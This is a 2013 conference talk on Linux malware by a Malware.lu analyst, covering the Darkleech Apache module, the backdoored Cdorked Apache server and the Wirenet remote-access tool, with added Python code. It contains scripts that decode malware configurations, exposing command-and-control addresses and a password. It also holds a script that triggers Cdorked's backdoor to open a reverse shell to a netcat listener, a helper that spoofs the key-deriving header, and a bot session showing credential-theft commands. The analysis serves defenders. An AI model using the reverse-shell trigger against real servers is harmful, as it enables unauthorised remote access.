Linux malware presentation
@r00tbsd – Paul Rascagnères, Malware.lu
July 2013
Plan
- Presentation
- Darkleech/Chapro
- Cdorked
- Wirenet
- Conclusion
Presentation – Who am I?
Paul Rascagnères, @r00tbsd / @malware.lu. Creator and maintainer of malware.lu. Malware analysis, incident response, reverse engineering... Author of “Malware – Identification, analyse et éradication”.
Presentation – Why am I here and why this talk?
Some people think that malware does not exist on the Linux platform. Four examples from 2012/2013:
- Darkleech (Apache module)
- Cdorked (Apache server)
- Wirenet (Remote Administration Tool)
- gift...
Darkleech/Chapro – First seen
The first version was identified in August 2012.

How does it work?
This malware is an Apache module. It is loaded by a LoadModule directive added to an Apache configuration file.

Features:
- inject JavaScript code to redirect visitors to a website hosting an exploit kit
- backdoor
Darkleech/Chapro – Analysis – module
Module file name pattern: mod_[a-z0-9]{3,}_[a-z0-9]{3,}\.so
Example: mod_sec2_config.so
Module loading (the LoadModule line is added to an Apache configuration file):
  $ cat /etc/apache2/modules/[VARIOUS].conf
  LoadModule sec2_config_module modules/mod_sec2_config.so

Darkleech/Chapro – Analysis – Symptoms
The malware injects exploit kit landing pages (JavaScript) into the web pages served by the compromised host. The redirection is performed by a JavaScript insertion that adds an IFrame (slides show screenshots of the injected code).
Darkleech/Chapro – Analysis – Target selection
The target selection is performed on the HTTP request headers: the Referer, and the User-Agent, which is matched against a ban list (C_ARRAY_BAN_USERAGENT). A client whose User-Agent matches an entry never receives the injection; note that crawlers, search-engine bots and non-Windows platforms are on the list:

C_ARRAY_BAN_USERAGENT: SAFARI, YANDEX, OPERA, CRAWLER, FIREFOX, JIKE, CHROME, SPIDER, GOOGLEBOT, ROBOT, SLURP, PAPERLIBOT, YAHOO, SNAPPREVIEWBOT, BING, BUFFERBOT, LINUX, MEDIAPARTNERS, OPENBSD, HATENA, MACINTOSH, BLUEDRAGON, MAC OS, WORDPRESS, IPHONE, XIANGUO, ...
Darkleech/Chapro – Analysis – Reversing
The configuration strings are stored encoded in the file (slide shows a hexdump of the encoded data). Several functions (symbols) are linked to the encoding:
- 0x17C8 xor_decrypt_string
- 0x17ED xor_encrypt_string
- 0x1800 xor_encrypt

xor_decrypt_string, decompiler output cleaned up into readable pseudo-C. The parameter roles are inferred from the raw output and from the Python re-implementation on the next slide (A8 = key, Ac = key length, A10 = encoded data, A14 = data length); the call to L00002D90 is taken to be malloc:

  char *xor_decrypt_string(const char *key, int key_len, const char *data, int len)
  {
      char *out = malloc(len + 1);
      for (int i = 0; i < len; i++)
          out[i] = data[i] ^ key[i % key_len];   /* repeating-key XOR */
      out[len] = '\0';                            /* NUL-terminate the result */
      return out;
  }
Darkleech/Chapro – Analysis – Reversing
xor_decrypt_string Python implementation (Python 2 script, as used in the talk):

  import sys
  from itertools import izip, cycle

  # tab: list of {'name', 'offset', 'size'} entries describing the encoded
  # strings; recovered from the module, not reproduced on the slide
  fd = open(sys.argv[1], 'rb')
  fd.seek(0x84a0)            # XOR key location in mod_sec2_config.so
  key = fd.read(23)
  for s in tab:
      fd.seek(s['offset'])
      data = fd.read(s['size'])
      # repeating-key XOR; the key cycle restarts for every string
      decrypted = ''.join(chr(ord(c) ^ ord(k)) for c, k in izip(data, cycle(key)))
      clear_text = decrypted.split('\x00')[0]   # fields are NUL-padded
      print('%s: %s' % (s['name'], clear_text))
Darkleech/Chapro – Analysis – Reversing
  $ python sec2.py "./mod_sec2_config.so"
  C_MODULE_VERSION: "2012.12.14"
  C_CC_HOST: "217.23.13.6"
  C_CC_URI: "/Home/index.php"
  C_CC_REQUEST_FORMAT: "POST %s HTTP/1.1
                        Host: %s
                        Content-Type: application/x-www-form-urlencoded
                        Content-Length: %i
                        %s"
  C_MARKER_LEFT: "{{{"
  C_MARKER_RIGHT: "}}}"
  C_TMP_DIR: "/"
  C_LIST_PREF: "sess_"
  C_COOKIE_NAME: "PHP_SESSION_ID="
  C_ARRAY_TAGS_FOR_INJECT: "</script>" "</style>" "</head>" "</title>" ...
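Added example, not the talk's script: a Python 3 re-implementation of the repeating-key XOR decoding shown on the previous slides, run on a constructed config blob, plus two ways to recover the 23-byte key without dumping it from the binary. Both exploit the storage format the slides show: every field is NUL-padded and the key cycle restarts per field, so the padding of a long field encrypts to the key itself (periodic ciphertext), and a known plaintext at the start of one field (here the "POST %s HTTP/1.1" request format) gives the key directly. The key, field values, sizes and offsets below are constructed and are not the real mod_sec2_config.so values.

```python
from itertools import cycle

KEY_LEN = 23
# Constructed sample key and config table (NOT the real module's values).
SAMPLE_KEY = bytes(range(0xA1, 0xA1 + KEY_LEN))
SAMPLE_FIELDS = [  # (name, plaintext, padded field size in the fake blob)
    ("C_MODULE_VERSION", b"2012.12.14", 16),
    ("C_CC_URI", b"/Home/index.php", 64),
    ("C_CC_REQUEST_FORMAT",
     b"POST %s HTTP/1.1\r\nHost: %s\r\nContent-Length: %i\r\n\r\n%s", 128),
    ("C_MARKER_LEFT", b"{{{", 8),
]


def xor_with_key(key, data):
    """Repeating-key XOR; the module restarts the key cycle for every field."""
    return bytes(c ^ k for c, k in zip(data, cycle(key)))


def xor_decrypt_string(key, data):
    """Equivalent of the module's xor_decrypt_string(): XOR, then stop at the first NUL."""
    return xor_with_key(key, data).split(b"\x00", 1)[0]


def build_blob(key, fields, base=0x100):
    """Lay NUL-padded, XOR-encoded fields out back to back after `base` zero bytes.
    Returns (blob, tab); tab mimics the offset/size table the decoding script uses."""
    blob = bytearray(b"\x00" * base)
    tab = []
    for name, plain, size in fields:
        assert len(plain) < size, "field must leave room for NUL padding"
        tab.append({"name": name, "offset": len(blob), "size": size})
        blob += xor_with_key(key, plain.ljust(size, b"\x00"))
    return bytes(blob), tab


def decrypt_table(blob, key, tab):
    """Decode every entry of the table, like the sec2.py loop."""
    return {s["name"]: xor_decrypt_string(key, blob[s["offset"]:s["offset"] + s["size"]])
            for s in tab}


def recover_key_from_padding(field, key_len):
    """NUL padding leaks the key: 0x00 XOR key byte == key byte, so the padded tail
    of a field is periodic with period key_len. Walk back from the end while
    field[i] == field[i - key_len]; the first mismatch sits key_len bytes after the
    last string byte. Returns None unless the periodic run is at least key_len long
    (padding >= 2*key_len), which rules out a string that merely repeats itself."""
    i = len(field) - 1
    while i >= key_len and field[i] == field[i - key_len]:
        i -= 1
    matches = len(field) - 1 - i
    if matches < key_len:
        return None
    key = bytearray(key_len)
    for j in range(i + 1 - key_len, len(field)):  # the whole padding region
        key[j % key_len] = field[j]
    return bytes(key)


def recover_key_from_crib(field, crib, key_len):
    """Known-plaintext recovery: the key cycle restarts per field, so a crib of at
    least key_len bytes at the start of one field gives the complete key."""
    if len(crib) < key_len:
        raise ValueError("crib must cover a full key period")
    return bytes(c ^ p for c, p in zip(field[:key_len], crib[:key_len]))


if __name__ == "__main__":
    blob, tab = build_blob(SAMPLE_KEY, SAMPLE_FIELDS)
    fmt = next(s for s in tab if s["name"] == "C_CC_REQUEST_FORMAT")
    field = blob[fmt["offset"]:fmt["offset"] + fmt["size"]]
    key = recover_key_from_padding(field, KEY_LEN) \
        or recover_key_from_crib(field, b"POST %s HTTP/1.1\r\nHost: %s", KEY_LEN)
    print("recovered key:", key.hex())
    for name, value in decrypt_table(blob, key, tab).items():
        print("%s: %r" % (name, value))
```

The padding method needs a field whose padding is at least twice the key length; short fields such as the 16-byte version string return None, and the crib method is the fallback. Both assume the plaintext contains no embedded NUL bytes.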
Cdorked – Presentation
Unlike its brother Darkleech/Chapro, Cdorked is not an Apache module but a custom (backdoored) Apache server binary. The malware uses XOR to encrypt its strings; the same decoding approach works, with a 24-byte key at 0x16B460 (Python 2 script, as used in the talk):

  import sys
  from itertools import izip, cycle

  # tab: list of {'offset', 'size'} entries for the encrypted strings,
  # recovered from the binary and not reproduced on the slide
  fd = open(sys.argv[1], 'rb')
  fd.seek(0x16B460)          # XOR key
  key = fd.read(24)
  for i, s in enumerate(tab):
      fd.seek(s['offset'])
      data = fd.read(s['size'])
      decrypted = ''.join(chr(ord(c) ^ ord(k)) for c, k in izip(data, cycle(key)))
      print('xx%s: %s' % (i, decrypted))
Cdorked – How to get a shell? – request and encryption
The backdoor is triggered by a specially crafted HTTP request (slide shows the request and the disassembly of the decryption routine). The command carried by the request is XOR-encrypted with a 4-byte key derived from the client IP address:

  ip = $client_ip
  key[0] = ((ip AND 0xFF000000) >> 24) + 5
  key[1] = ((ip AND 0xFF0000)   >> 16) + 33
  key[2] = ((ip AND 0xFF00)     >> 8)  + 55
  key[3] = ((ip AND 0xFF))             + 78

Each key byte is an 8-bit value, so the additions wrap modulo 256. The client IP is taken from the request itself (the X-Real-IP header used by the script on the next slide), so the attacker chooses the key.
Cdorked – How to get a shell? – the reverse shell (Python 2 script, as used in the talk)

  import os
  import subprocess
  import time
  import urllib2

  LHOST = '192.168.56.1'     # where the reverse shell connects back to
  LPORT = '4444'
  RHOST = '192.168.56.101'   # infected Apache server
  RPORT = '80'

  # Hex-encoded backdoor command. With X-Real-IP = 251.223.201.178 every octet
  # plus its constant (5, 33, 55, 78) equals 256, so the derived XOR key is four
  # 0x00 bytes and the encryption step is a no-op: the hex of the plaintext
  # command is accepted as-is.
  param = ('GET_BACK;%s;%s' % (LHOST, LPORT)).encode('hex')
  request = 'http://%s:%s/favicon.iso?%s' % (RHOST, RPORT, param)

  if os.fork():
      time.sleep(1)   # let the child start listening before triggering
      req = urllib2.Request(request)
      req.add_header('X-Real-IP', '251.223.201.178')
      urllib2.urlopen(req)
  else:
      # OpenBSD netcat syntax; traditional netcat needs 'nc -l -p 4444'
      subprocess.call(['nc', '-l', LPORT])
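Added example, not the talk's script: a Python 3 implementation of the key derivation from the previous slide, the command encoding and its inverse, and a check of why the spoofed X-Real-IP used above works. The key derivation is the one on the slide; how the 4-byte key is applied to the command is an assumption here (a repeating XOR over the command bytes before hex encoding), since the slide's screenshot of that step is not reproduced. Hosts and ports are the talk's lab values, not real infrastructure.

```python
import ipaddress
from itertools import cycle

# Per-octet constants from the slide: key[i] = octet[i] + KEY_ADDENDS[i].
KEY_ADDENDS = (5, 33, 55, 78)


def derive_key(client_ip):
    """4-byte XOR key from the client IP; each sum is truncated to a byte (mod 256)."""
    octets = ipaddress.IPv4Address(client_ip).packed
    return bytes((o + a) & 0xFF for o, a in zip(octets, KEY_ADDENDS))


def encode_command(command, client_ip):
    """XOR the command with the derived key (assumed to repeat) and hex-encode it."""
    key = derive_key(client_ip)
    return bytes(c ^ k for c, k in zip(command.encode(), cycle(key))).hex()


def decode_command(query, client_ip):
    """Inverse of encode_command: what the backdoor would do with the query string
    of a trigger request, given the client IP it derives the key from."""
    key = derive_key(client_ip)
    return bytes(c ^ k for c, k in zip(bytes.fromhex(query), cycle(key))).decode("latin-1")


def build_request(rhost, rport, lhost, lport, spoofed_ip):
    """(URL, headers) equivalent to what the talk's reverse-shell script sends.
    The server trusts X-Real-IP for the client address, so the key is attacker-chosen."""
    param = encode_command("GET_BACK;%s;%s" % (lhost, lport), spoofed_ip)
    return "http://%s:%s/favicon.iso?%s" % (rhost, rport, param), {"X-Real-IP": spoofed_ip}


def null_key_ip():
    """The client address whose derived key is all zeros: octet[i] = 256 - addend[i].
    With that key the XOR is a no-op, which is why hex(plaintext) works on the slide."""
    return ".".join(str((256 - a) & 0xFF) for a in KEY_ADDENDS)


if __name__ == "__main__":
    print("all-zero-key IP:", null_key_ip())
    url, headers = build_request("192.168.56.101", 80, "192.168.56.1", 4444, null_key_ip())
    print(url, headers)
    # With a real client address the key is non-trivial and must be applied.
    print(derive_key("192.168.56.1").hex(),
          decode_command(encode_command("GET_BACK;192.168.56.1;4444", "192.168.56.1"),
                         "192.168.56.1"))
```

For a proxy-less deployment the key would come from the TCP peer address instead, so a trigger request captured on the wire decodes with decode_command(query, peer_ip).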
Wirenet – Strings obfuscation
The attacker used the RC4 algorithm to encrypt the configuration. The 16-byte key is stored in the binary at 0xf4d8, and a fresh RC4 instance is created for every field (slide shows the disassembly). Decoding script (Python 2 with PyCrypto, as used in the talk):

  import sys
  from Crypto.Cipher import ARC4

  # crypted: list of {'name', 'adr', 'len'} entries for the encrypted fields;
  # options: {option_name: bitmask} for the BoolSettingsByte flags.
  # Both tables were recovered from the binary and are not reproduced on the
  # slide. isOption is not shown either; a plain bitmask test is assumed here.
  def isOption(val, mask):
      return bool(int(val) & mask)

  fp = open(sys.argv[1], 'rb')
  fp.seek(0xf4d8, 0)
  key = fp.read(16)
  for c in crypted:
      rc4 = ARC4.new(key)     # new cipher per field: same key, same keystream
      fp.seek(c['adr'])
      data = fp.read(c['len'])
      val = rc4.decrypt(data).split('\x00')[0]   # fields are NUL-padded
      print "%s: %s" % (c['name'], val)
      if c['name'] == 'BoolSettingsByte':
          for name, o in options.iteritems():
              print "%s: %s" % (name, isOption(val, o))
Wirenet – Strings obfuscation
  y0ug@laptop:~$ python decode.py 9a0e765eecc5433af3dc726206ecc56e
  ConnectionString: 212.7.208.65:4141;
  ProxyString: -
  Password: sm0k4s523syst3m523
  HostId: LINUX
  MutexName: vJEewiWD
  InstallPath: %home%/WIFIADAPT
  StartupKeyName1: WIFIADAPTER
  StartupKeyName2: -
  KeyLoggerFileName: %Home%\.m8d.dat
  BoolSettingsByte: 237
  run_as_daemon: True
  xinit_start: False
  install_file: True
  lock_file?: True
  keylogger: True
  single_instance: True
  desktop_start: True
  ConnectionType: 001
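Added example, not the talk's decode.py: a dependency-free Python 3 version of the RC4 configuration decoding above, run on a constructed blob, with the flag decoding of BoolSettingsByte and one consequence of the per-field RC4 re-initialisation the slides describe. Because every field is encrypted with a new cipher under the same key, every field uses the same keystream: knowing one field's plaintext (HostId is "LINUX" on the slide) reveals the keystream prefix and therefore the start of every other field, password included, without the key. The key, key offset, field values and the bit positions in OPTIONS are constructed for this example (the masks are chosen so that 237 reproduces the slide's flag output; the real bit assignment is not on the slide).

```python
def rc4_keystream(key):
    """RC4 key scheduling followed by the PRGA, as an endless byte generator."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    i = j = 0
    while True:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        yield S[(S[i] + S[j]) & 0xFF]


def rc4(key, data):
    """Encrypt/decrypt (RC4 is symmetric) with a fresh cipher state."""
    return bytes(b ^ k for b, k in zip(data, rc4_keystream(key)))


# Constructed sample (NOT the real Wirenet values or offsets).
SAMPLE_KEY = bytes.fromhex("00112233445566778899aabbccddeeff")
KEY_OFFSET = 0x40
SAMPLE_FIELDS = [  # (name, plaintext, field length in the blob)
    ("ConnectionString", b"10.0.0.1:4141;", 64),
    ("Password", b"changeme", 32),
    ("HostId", b"LINUX", 8),
    ("BoolSettingsByte", b"237", 4),
]
# Hypothetical bit assignment for BoolSettingsByte, chosen to match the slide's output.
OPTIONS = {"run_as_daemon": 0x01, "xinit_start": 0x02, "install_file": 0x04,
           "lock_file?": 0x08, "keylogger": 0x20, "single_instance": 0x40,
           "desktop_start": 0x80}


def build_blob(key, fields, key_offset=KEY_OFFSET):
    """Key at key_offset, then NUL-padded fields, each encrypted with a fresh RC4
    instance exactly like the bot does. Returns (blob, table of name/adr/len)."""
    blob = bytearray(b"\x00" * key_offset) + bytearray(key)
    table = []
    for name, plain, length in fields:
        assert len(plain) < length
        table.append({"name": name, "adr": len(blob), "len": length})
        blob += rc4(key, plain.ljust(length, b"\x00"))
    return bytes(blob), table


def decrypt_config(blob, table, key_offset=KEY_OFFSET, key_len=16):
    """The decode.py loop: read the key, decrypt each field, cut at the first NUL."""
    key = blob[key_offset:key_offset + key_len]
    return {c["name"]: rc4(key, blob[c["adr"]:c["adr"] + c["len"]]).split(b"\x00", 1)[0]
            for c in table}


def decode_flags(value, options=OPTIONS):
    """BoolSettingsByte is a bitmask; one boolean per option."""
    return {name: bool(value & mask) for name, mask in options.items()}


def keystream_from_known(cipher, known_plain):
    """Keystream reuse: ciphertext XOR known plaintext = keystream prefix, valid for
    every field because each one restarts RC4 with the same key."""
    return bytes(c ^ p for c, p in zip(cipher, known_plain))


def leak_prefix(blob, table, known_name, known_plain, target_name):
    """Decrypt the first len(known_plain) bytes of target_name without the key."""
    k = next(c for c in table if c["name"] == known_name)
    t = next(c for c in table if c["name"] == target_name)
    ks = keystream_from_known(blob[k["adr"]:k["adr"] + k["len"]], known_plain)
    return bytes(c ^ s for c, s in zip(blob[t["adr"]:t["adr"] + t["len"]], ks))


if __name__ == "__main__":
    blob, table = build_blob(SAMPLE_KEY, SAMPLE_FIELDS)
    cfg = decrypt_config(blob, table)
    for name, val in cfg.items():
        print("%s: %s" % (name, val.decode()))
    for name, on in decode_flags(int(cfg["BoolSettingsByte"])).items():
        print("%s: %s" % (name, on))
    print("Password prefix via keystream reuse:",
          leak_prefix(blob, table, "HostId", b"LINUX", "Password"))
```

The same keystream-reuse observation applies to the real sample: any field whose value is predictable (HostId, the "-" placeholders) gives away the corresponding bytes of every other field.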
Wirenet – Fake C&C
Session of the fake C&C server with a bot running on an Ubuntu test machine:

  wirenet $
  New session 127.0.0.1:52956
  wirenet $ session
  0 127.0.0.1:52956 LINUX rootbsd @ alien
  wirenet $ session 0
  Switch to session 0 context
  127.0.0.1:52956 $ help
  Undocumented commands:
  ======================
  EOF          cred_thunderbird  get   log_clear  mkdir  rm      shell
  cp           creds             help  log_get    mv     screen
  cred_pidgin  exit              info  ls         ps     session

  127.0.0.1:52956 $ info
  arch: LINUX
  name: rootbsd @ alien
  DISTRIB_ID=Ubuntu
  DISTRIB_RELEASE=12.04
  DISTRIB_CODENAME=precise
  DISTRIB_DESCRIPTION="Ubuntu 12.04.1 LTS"
  127.0.0.1:52956 $ shell
  Shell is start with /bin/sh (EOF to exit)
  id
  uid=1000(rootbsd) gid=1000(rootbsd) groups=1000(rootbsd),4(adm),20(dialout),24(cdrom),46(plugdev),116(lpadmin),118(admin),124(sambashare),1001(bumblebee)
  Shell is stop